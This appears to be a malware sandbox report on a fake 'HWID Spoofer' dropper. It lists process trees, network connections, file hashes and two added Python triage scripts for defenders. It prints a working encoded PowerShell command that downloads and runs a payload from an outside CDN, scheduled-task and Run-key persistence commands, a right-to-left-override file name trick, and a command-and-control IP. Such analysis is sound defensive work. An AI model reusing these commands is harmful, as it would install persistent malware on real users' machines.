PID 2980 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1596 wrote to memory of 3708 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe
PID 1596 wrote to memory of 3708 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe
PID 1596 wrote to memory of 3708 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe
PID 4600 wrote to memory of 2324 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr

"C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr" /S

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\KOAW3yBMbE.sln

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\QTs856dGDI.exe

C:\Users\Admin\AppData\Local\Temp\QTs856dGDI.exe

C:\Users\Admin\AppData\Local\Temp\QTs856dGDI.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\Vozc9zcB7p.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[encoded command omitted]"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe

C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe

C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe

C:\Users\Admin\AppData\Local\Temp\Vozc9zcB7p.exe

C:\Users\Admin\AppData\Local\Temp\Vozc9zcB7p.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\NscvTD3b58.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[encoded command omitted]"

C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe

C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[encoded command omitted]"

C:\Users\Admin\AppData\Local\Temp\NscvTD3b58.exe

C:\Users\Admin\AppData\Local\Temp\NscvTD3b58.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\uB9RoX6o7E.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAeAB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AaQBtAGcAMgAuAGcAdQBpAGwAZABlAGQAYwBkAG4ALgBjAG8AbQAvAEMAbwBuAHQAZQBuAHQATQBlAGQAaQBhAEcAZQBuAGUAcgBpAGMARgBpAGwAZQBzAC8AYwA3ADMANgAzADIAOQBmADAAZAAxAGQANgA4AGUAZgA3ADQAMgAxAGYAMQBkADAANwA1AGMANwA3AGMAMQA3AC0ARgB1AGwAbAAuAHoAaQBwACcALAAgADwAIwBtAGoAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAeAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAeAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAOAAwAGoAawBoAGsAZABzAGEAMgAzAGsAagBsAGsAaAAyAC4AZQB4AGUAJwApACkAPAAjAGkAbAB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGkAdQBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHkAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiADgAMABqAGsAaABrAGQAcwBhADIAMwBrAGoAbABrAGgAMgAuAGUAeABlACcAKQA8ACMAeABhAG0AIwA+AA=="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[encoded command omitted]"

C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe

C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[encoded command omitted]"

C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe

"C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \F2g3 /tr "C:\Users\Admin\AppData\Roaming\F2g3\F2g3.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \F2g3 /tr "C:\Users\Admin\AppData\Roaming\F2g3\F2g3.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'F2g3';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'F2g3' -Value '"C:\Users\Admin\AppData\Roaming\F2g3\F2g3.exe"' -PropertyType 'String'

C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe

"C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe"

C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe

"C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe"

C:\Users\Admin\AppData\Local\Temp\b80jkhkfddasa23kjlkh2.exe

"C:\Users\Admin\AppData\Local\Temp\b80jkhkfddasa23kjlkh2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1376 -ip 1376

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 768

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv BYEBNlyhtUKPqNCgpKVhng.0.2

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe"

C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe

"C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \Gbn1 /tr "C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Gbn1';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Gbn1' -Value '"C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \Gbn1 /tr "C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "chcp"

C:\Windows\SysWOW64\chcp.com

chcp

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\siikebuhzwkefoct" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 --field-trial-handle=1916,i,8185326580353422707,9685558384079477453,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\siikebuhzwkefoct" --mojo-platform-channel-handle=2168 --field-trial-handle=1916,i,8185326580353422707,9685558384079477453,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Users\Admin\AppData\Local\Temp\b80jkh876yhsdda23kjlkh2.exe

"C:\Users\Admin\AppData\Local\Temp\b80jkh876yhsdda23kjlkh2.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe

C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
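The schtasks and PowerShell command lines in the process list above are the sample's two persistence mechanisms: a scheduled task named Gbn1 that launches the %APPDATA% copy with highest privileges and keeps re-arming itself (a one-shot task with /ri 60 repeating for 9999 hours, roughly 416 days), and an HKCU Run value of the same name that is first removed and then re-created. The script below is an added example, not part of the sandbox report, that parses command lines in this shape and pulls out each persistence artifact together with the reasons it is suspicious. The input list is constructed from the lines above, and the triage rules (which flags count as suspicious) are assumptions for the example.

```python
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass

# Command lines copied from the process list above. The list is constructed for
# this example; the strings are the ones the sandbox recorded in this detonation.
OBSERVED_CMDLINES = r'''
"cmd" /C schtasks /create /tn \Gbn1 /tr "C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
schtasks /create /tn \Gbn1 /tr "C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Gbn1';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Gbn1' -Value '"C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe"' -PropertyType 'String'
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
'''.strip().splitlines()

RUNKEY_RE = re.compile(
    r"New-ItemProperty\s+-Path\s+'(?P<path>[^']+)'\s+-Name\s+'(?P<name>[^']+)'"
    r"\s+-Value\s+'(?P<value>[^']*)'",
    re.IGNORECASE,
)
REMOVE_RE = re.compile(r"remove\s*-\s*itemproperty", re.IGNORECASE)


@dataclass(frozen=True)
class Persistence:
    kind: str       # "schtask" or "runkey"
    name: str       # task name or Run value name
    target: str     # binary the mechanism launches
    flags: tuple    # why the entry is suspicious (rules are assumptions for the example)


def _unquote(s: str) -> str:
    return s.strip('"\'')


def parse_schtasks(cmdline: str) -> Persistence | None:
    # posix=False keeps Windows quoting: quoted paths stay whole, backslashes are literal.
    tokens = shlex.split(cmdline, posix=False)
    names = [_unquote(t).lower().rsplit('\\', 1)[-1] for t in tokens]
    if 'schtasks' not in names or '/create' not in names:
        return None
    opts: dict[str, str] = {}
    i = names.index('schtasks') + 1
    while i < len(tokens):
        tok = tokens[i]
        if not tok.startswith('/'):
            i += 1
            continue
        has_val = i + 1 < len(tokens) and not tokens[i + 1].startswith('/')
        opts[tok.lower()] = _unquote(tokens[i + 1]) if has_val else ''
        i += 2 if has_val else 1
    target = opts.get('/tr', '')
    flags = []
    if opts.get('/rl', '').upper() == 'HIGHEST':
        flags.append('runs with highest privileges (/rl HIGHEST)')
    if opts.get('/sc', '').lower() == 'once' and '/ri' in opts:
        flags.append(f"one-shot task re-armed every {opts['/ri']} min for {opts.get('/du', '?')} (hours:min)")
    if '\\appdata\\' in target.lower():
        flags.append('target lives under the user profile (AppData)')
    return Persistence('schtask', opts.get('/tn', '').lstrip('\\'), target, tuple(flags))


def parse_runkey(cmdline: str) -> Persistence | None:
    m = RUNKEY_RE.search(cmdline)
    if not m or not m['path'].lower().endswith('\\currentversion\\run'):
        return None
    target = _unquote(m['value'])
    flags = ['HKCU Run value: survives logoff, needs no admin rights']
    if REMOVE_RE.search(cmdline):
        flags.append('value is deleted and re-created in the same command')
    if '\\appdata\\' in target.lower():
        flags.append('target lives under the user profile (AppData)')
    return Persistence('runkey', m['name'], target, tuple(flags))


def triage_persistence(cmdlines: list[str]) -> list[Persistence]:
    """Return the distinct persistence artifacts found across the given command lines."""
    found: dict[tuple, Persistence] = {}
    for line in cmdlines:
        for parser in (parse_schtasks, parse_runkey):
            p = parser(line)
            if p is not None:
                # cmd /C schtasks and the schtasks child describe the same task: keep one
                found.setdefault((p.kind, p.name.lower(), p.target.lower()), p)
    return list(found.values())


if __name__ == '__main__':
    for p in triage_persistence(OBSERVED_CMDLINES):
        print(f"{p.kind:8} {p.name:6} -> {p.target}")
        for flag in p.flags:
            print(f"           - {flag}")
```

On a live host the same two artifacts are what to check during cleanup: the task under \Gbn1 (and \F2g3 for the other dropper) and the HKCU Run values of those names, plus the binaries they point at under AppData\Roaming.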

Network

Country Destination Domain Proto
US 8.8.8.8:53 textbin.net udp
US 148.72.177.212:443 textbin.net tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 rentry.co udp
FR 164.132.58.105:443 rentry.co tcp
US 8.8.8.8:53 212.177.72.148.in-addr.arpa udp
US 8.8.8.8:53 3.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 105.58.132.164.in-addr.arpa udp
US 8.8.8.8:53 img2.guildedcdn.com udp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 8.8.8.8:53 20.145.155.18.in-addr.arpa udp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 8.8.8.8:53 195.233.44.23.in-addr.arpa udp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
NL 20.31.169.57:443 tcp
TR 46.1.103.124:2341 tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 4.200.250.142.in-addr.arpa udp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
TR 46.1.103.124:2341 tcp
US 8.8.8.8:53 api.gofile.io udp
US 8.8.8.8:53 api.telegram.org udp
FR 51.38.43.18:443 api.gofile.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 store3.gofile.io udp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
FR 31.14.70.244:443 store3.gofile.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 18.43.38.51.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 244.70.14.31.in-addr.arpa udp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 210.178.17.96.in-addr.arpa udp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
TR 46.1.103.124:2341 tcp
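Most of the Network table is resolver noise: the 8.8.8.8:53 rows are DNS queries and the in-addr.arpa rows are PTR lookups. What an analyst should chase is the small set of TCP flows with an empty Domain column, above all the repeated connections to 46.1.103.124 on ports 2341 and 9371, and the TCP sessions to paste, CDN and messaging services that the report's "Legitimate hosting services abused for malware hosting/C2" signature refers to. The script below is an added example, not part of the report, that reads rows in the table's format and separates beacon candidates from staging hosts and external-IP lookups. The row subset, the DEAD_DROP_HOSTS and IP_CHECK_HOSTS lists and the classification thresholds are constructed or assumed for the example.

```python
from __future__ import annotations

from collections import Counter
from dataclasses import dataclass

# Rows copied from the Network table above; this subset is constructed for the
# example. A row with no Domain column is a connection made directly to an IP.
NETWORK_ROWS = """
US 8.8.8.8:53 textbin.net udp
US 148.72.177.212:443 textbin.net tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 rentry.co udp
FR 164.132.58.105:443 rentry.co tcp
US 8.8.8.8:53 212.177.72.148.in-addr.arpa udp
US 18.155.145.20:443 img2.guildedcdn.com tcp
NL 20.31.169.57:443 tcp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.38.43.18:443 api.gofile.io tcp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
TR 46.1.103.124:2341 tcp
US 8.8.8.8:53 udp
TR 46.1.103.124:9371 tcp
""".strip().splitlines()

# Public paste/CDN/messaging services the sample talks to. Treating them as
# dead-drop or staging hosts is an assumption for this example, seeded from the
# domains in the table.
DEAD_DROP_HOSTS = {
    'pastebin.com', 'rentry.co', 'textbin.net', 'cdn.discordapp.com', 'discord.com',
    'api.gofile.io', 'store3.gofile.io', 'img2.guildedcdn.com', 'api.telegram.org',
}
IP_CHECK_HOSTS = {'ipinfo.io'}      # external-IP lookup services (assumption)
STANDARD_PORTS = {80, 443}


@dataclass(frozen=True)
class Flow:
    country: str
    ip: str
    port: int
    domain: str | None
    proto: str


def parse_rows(rows: list[str]) -> list[Flow]:
    """Parse 'Country Destination [Domain] Proto' rows as printed in the report."""
    flows = []
    for row in rows:
        parts = row.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:            # empty Domain column
            country, dest, proto = parts
            domain = None
        else:
            continue                     # malformed row, skip it
        ip, port = dest.rsplit(':', 1)
        flows.append(Flow(country, ip, int(port), domain, proto))
    return flows


def triage_network(flows: list[Flow]) -> dict:
    """Drop resolver noise and bucket the TCP flows an analyst should chase."""
    beacons: Counter[tuple[str, int]] = Counter()
    staging, ip_check = set(), set()
    for f in flows:
        if f.proto != 'tcp':
            continue                     # DNS queries and PTR lookups are noise here
        if f.domain is None:
            beacons[(f.ip, f.port)] += 1  # direct-to-IP: no hostname to pivot on
        elif f.domain in DEAD_DROP_HOSTS:
            staging.add(f.domain)
        elif f.domain in IP_CHECK_HOSTS:
            ip_check.add(f.domain)
    # A bare-IP session on a non-standard port, or repeated sessions to the same
    # socket, is the beacon pattern; a single bare-IP hit on 443 is left for review.
    suspicious = {k: n for k, n in beacons.items()
                  if k[1] not in STANDARD_PORTS or n > 1}
    return {
        'beacons': suspicious,
        'review_once': {k: n for k, n in beacons.items() if k not in suspicious},
        'staging': sorted(staging),
        'ip_check': sorted(ip_check),
    }


if __name__ == '__main__':
    report = triage_network(parse_rows(NETWORK_ROWS))
    for (ip, port), n in sorted(report['beacons'].items()):
        print(f"beacon candidate {ip}:{port}  ({n} sessions)")
    print('staging hosts:', ', '.join(report['staging']))
    print('external-IP check:', ', '.join(report['ip_check']))
```

Over the full table the two 46.1.103.124 sockets account for well over twenty sessions, alternating between the two ports, which is the pattern to block at the egress firewall; the staging hosts are shared public services and should be handled as hunt pivots (which URL paths were fetched), not as blanket blocks.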

Files

memory/5064-0-0x00007FF6F7E30000-0x00007FF6F7F94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KOAW3yBMbE.sln

MD5 7d447e1ef857ddf5640f2456f2d29e92
SHA1 60131aa77dea336e77892edbf2531c443fbb62e6
SHA256 6a14a1c978a93731c379357248807f069795e1bebb0e0166bccc57a2c5c2559f
SHA512 f02199eea81e1e9c7f3cd1f6c3df9690650b4a43720e1a560099cb15ed6bf8498a2871c8a9130afc30ac58ee6b8c777e2a94c02444b6574555cfdf1129fa8c4d

C:\Users\Admin\AppData\Local\Temp\QTs856dGDI.exe

MD5 f06bf63ed6fac19600bdec659830ecd4
SHA1 5e1388dc5be77be8c3f9b8ddeb62ea3efcc3dc4c
SHA256 3978d7c24058277c035d86a8c90d86088296363d116f1be9bae582e619936b01
SHA512 a41d41faf69d57084c3f5f43618443047bbf41e8f7868c9215b8cef3492390f1bdf754a499d77b09c4530adc1a2b2f1e871adde3c72ccd4f56d41c6c0da32605

memory/3912-8-0x0000000000480000-0x0000000000488000-memory.dmp

memory/3912-10-0x00007FFFBECD0000-0x00007FFFBF791000-memory.dmp

memory/3912-13-0x00007FFFBECD0000-0x00007FFFBF791000-memory.dmp

memory/4944-21-0x0000000000A60000-0x0000000000A68000-memory.dmp

memory/1064-20-0x00000000003B0000-0x00000000003B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe

MD5 6cb6c698d53c178727d4c4299c105dbe
SHA1 789f07d0f52581a02be7f497657ed8894f671fa8
SHA256 8a07ee9f5ee2ca63568a7668e85f65520da0a5dd94cc7effa2cd22e10b33fd16
SHA512 27cc4aa468616b865bbd8c3115b88f7ae11f7d7b266e0468abb1b4dc9209797855b93e38338b63ae1e27ae703d4214f6d55ef0ba6a1e36809df824d3ed9d3f0d

C:\Users\Admin\AppData\Local\Temp\Vozc9zcB7p.exe

MD5 a5eb0994d01573048175133608708c49
SHA1 5bc469c18812cf70f403a0e429dcbc57d16bd89b
SHA256 d5de47473170b06397d419fe05946e70d633ce1de1c493e967d6010ad651ca0a
SHA512 a31b705befc391e9d4a999da20515f9903aa8922fe3cd35869380145e7a89b5ca4395bbc7da654f01c424abd26b77f821b28be72440063411bc8c209424cc5fc

memory/1064-23-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

memory/4944-24-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

memory/4824-25-0x000001F586B60000-0x000001F586B70000-memory.dmp

memory/4824-27-0x000001F586B60000-0x000001F586B70000-memory.dmp

memory/4824-28-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

memory/4824-35-0x000001F5A0ED0000-0x000001F5A0EF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d004nlyt.zpo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4944-41-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

memory/1064-42-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe

MD5 282c4bb41487f90e4c9b08aa11b125f8
SHA1 c26ad88a5a9af4a500ea58a0e135b652fabeebcd
SHA256 0f2bf570499bbfe78f887fe245508f6c3a324b7def653007913d6ccf469a74dd
SHA512 1292e47f81443d9692f586aadcf716f602605b146aa25ee624d7370183ef37712f6518d986f8d23ed0fcb77c5c285d78a143f96334d51e6bdf2c74d15bbe1007

memory/3448-47-0x0000000000620000-0x0000000000628000-memory.dmp

memory/1928-50-0x0000000000FB0000-0x0000000000FB8000-memory.dmp

memory/3448-51-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NscvTD3b58.exe

MD5 63e76a45b3d832cee275f78f1b8d73fc
SHA1 833412c447fba7c8455dad2da72cf7365505006c
SHA256 e442483f6b93375e67de074aa53a44dac3b73d11532d716576c726b0826135c0
SHA512 da910848467cb6395d7216f066326c3cf1bd3e884ef17d017a3319f9b5de8baf363a928d08e576e81695807e82a32a11d49ea06a56ff2c005438db8c9e6c67fa

memory/4624-54-0x000001C120A00000-0x000001C120A10000-memory.dmp

memory/4624-53-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

memory/4624-55-0x000001C120A00000-0x000001C120A10000-memory.dmp

memory/3744-65-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

